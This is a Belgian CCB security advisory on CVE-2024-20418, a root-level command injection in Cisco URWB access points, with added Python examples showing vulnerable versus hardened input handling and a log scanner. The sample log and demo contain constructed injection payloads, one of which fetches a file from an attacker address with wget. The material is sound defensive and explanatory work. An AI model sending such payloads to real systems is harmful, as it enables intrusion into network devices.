
Warning: Critical Command Injection In Cisco URWB With Root Privileges, Perfect CVSS 10 Score, Patch Immediately!

Reference: 
Advisory #2024-258
Version: 
1.0
Affected software: 
Cisco products running a vulnerable release and having the Ultra-Reliable Wireless Backhaul (URWB) operating mode enabled. Per Cisco's advisory, URWB operating mode is enabled, and the device affected, if the show mpls-config CLI command is available; if the command is not available, URWB mode is disabled and the device is not affected.
Catalyst IW9165D Heavy Duty Access Points
Catalyst IW9165E Rugged Access Points and Wireless Clients
Catalyst IW9167E Heavy Duty Access Points
Type: 
Command Injection
CVE/CVSS: 

CVE-2024-20418: CVSS 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Sources

Cisco: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs

Risks

The vulnerability has a perfect CVSS score of 10, meaning it has a severe impact on the confidentiality, integrity, and availability of the affected systems. A threat actor can perform the attack remotely over the network, without prior authentication to the system and without any user interaction.

Description

CVE-2024-20418 is a command injection vulnerability caused by improper input validation. It affects the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points.

An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit gives them the ability to execute arbitrary commands with root privileges on the underlying operating system of the affected device, i.e. full control of the access point.
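The defect class the advisory names, improper input validation that lets a request parameter reach a shell, is shown below as an added illustration. It is not code from the affected Cisco firmware (whose internals are not public) and assumes a hypothetical diagnostics endpoint that takes a host parameter; `echo` stands in for the real tool so the example runs harmlessly. The vulnerable form is shown beside a partial fix (no shell) and a hardened form (allowlist validation plus no shell).

```python
import re
import subprocess

# Illustrative pattern only: not the affected Cisco code. It demonstrates the
# defect class in the advisory (user input reaching a shell unvalidated) on a
# hypothetical "diag?host=..." management endpoint.

# Allowlist for a hostname/IP parameter: letters, digits, dots and hyphens.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})$")


def run_diag_vulnerable(host: str) -> str:
    """Vulnerable: the request parameter is spliced into a shell command line.
    shell=True hands the string to /bin/sh, so ';', '|', '&&', backticks and
    $() inside `host` are parsed as shell syntax and run as extra commands."""
    cmd = f"echo diag {host}"  # 'echo' stands in for the real tool (e.g. ping)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_diag_no_shell(host: str) -> str:
    """Partial fix: argv list, no shell. Metacharacters are now just bytes in
    one argument, so nothing extra executes, but garbage still reaches the tool."""
    return subprocess.run(["echo", "diag", host], capture_output=True, text=True).stdout


def run_diag_hardened(host: str) -> str:
    """Hardened: validate against the hostname allowlist first, then invoke
    without a shell. Anything that is not a plausible hostname is rejected."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"invalid host parameter: {host!r}")
    return subprocess.run(["echo", "diag", host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "10.0.0.1; echo INJECTED"   # constructed injection payload
    print(run_diag_vulnerable(payload))   # second command actually runs
    print(run_diag_no_shell(payload))     # printed literally, nothing runs
    try:
        run_diag_hardened(payload)
    except ValueError as e:
        print("rejected:", e)
```

Note that the vulnerable variant runs under whatever user the web process has; on an appliance where the management daemon runs as root, that is the root-level command execution described above. The allowlist is the real fix: dropping the shell removes the injection, but validation also keeps malformed values out of the downstream tool.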

Visit the vendor’s advisory for more information: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs

Recommended actions

Patch

The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority, after thorough testing. Cisco states that there are no workarounds that address this vulnerability; until the update is applied, restrict network access to the web-based management interface of affected devices to trusted management networks only.

Monitor/Detect

The CCB recommends that organizations scale up their monitoring and detection capabilities to identify any related suspicious activity, in particular unexpected or malformed HTTP requests to the management interface of these access points, ensuring a swift response in case of an intrusion.
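The vendor advisory referenced on this page publishes no indicators of compromise, so detection has to rely on the generic shape of the attack: crafted HTTP requests carrying shell syntax in parameters sent to the management interface. The following added example (not part of the CCB advisory or any Cisco tooling) scans constructed access-log lines in combined-log format for URL-encoded shell metacharacters; the log format, paths and IP addresses are all assumptions, and the real device or reverse-proxy log format must be substituted.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (combined log format). The management-interface log
# format of the affected devices is not described in the advisory; adapt LOG_RE
# to whatever your appliance or the reverse proxy in front of it emits.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Nov/2024:10:01:02 +0100] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Nov/2024:10:01:09 +0100] "POST /cgi-bin/diag?host=10.0.0.1 HTTP/1.1" 200 88 "-" "curl/8.4.0"
198.51.100.7 - - [06/Nov/2024:10:01:11 +0100] "POST /cgi-bin/diag?host=10.0.0.1%3Bid HTTP/1.1" 200 140 "-" "curl/8.4.0"
198.51.100.7 - - [06/Nov/2024:10:01:15 +0100] "GET /cgi-bin/diag?host=%24%28wget%20http%3A%2F%2F198.51.100.7%2Fx%29 HTTP/1.1" 500 0 "-" "python-requests/2.31"
192.0.2.11 - - [06/Nov/2024:10:02:00 +0100] "GET /status?name=backhaul-ap-01 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters and constructs that have no business in a hostname,
# filename or similar parameter of a management request.
META_RE = re.compile(r'[;|&`\n]|\$\(|\$\{|\|\||&&|>\s*/')


def decode_target(target: str, rounds: int = 3) -> str:
    """URL-decode the request target repeatedly (bounded) to unwrap double encoding."""
    cur = target
    for _ in range(rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def parse_line(line: str):
    """Return a dict of fields for a combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded"] = decode_target(entry["target"])
    return entry


def is_suspicious(entry: dict) -> bool:
    """Flag a request whose decoded target contains shell syntax."""
    return META_RE.search(entry["decoded"]) is not None


def scan(log_text: str) -> list:
    """Return the parsed entries that look like command-injection attempts."""
    return [e for e in (parse_line(l) for l in log_text.splitlines()) if e and is_suspicious(e)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["src"]} {hit["method"]} {hit["decoded"]} -> {hit["status"]}')
```

Two caveats apply when using this on real traffic. Access logs normally record only the request line, so a payload carried in a POST body is invisible here; full-request capture at a reverse proxy or WAF is needed for that. And a hit from an address that also appears on the device's normal admin paths, or a 200 response to a request with shell syntax in it, is the case to treat as a possible compromise rather than a blocked attempt.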

In case of an intrusion, you can report an incident via: https://ccb.belgium.be/en/cert/report-incident.

While patching appliances or software to the newest version protects against future exploitation, it does not remediate a compromise that has already occurred: devices that were exposed while vulnerable should be checked for signs of intrusion, not only updated.

More information

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-20418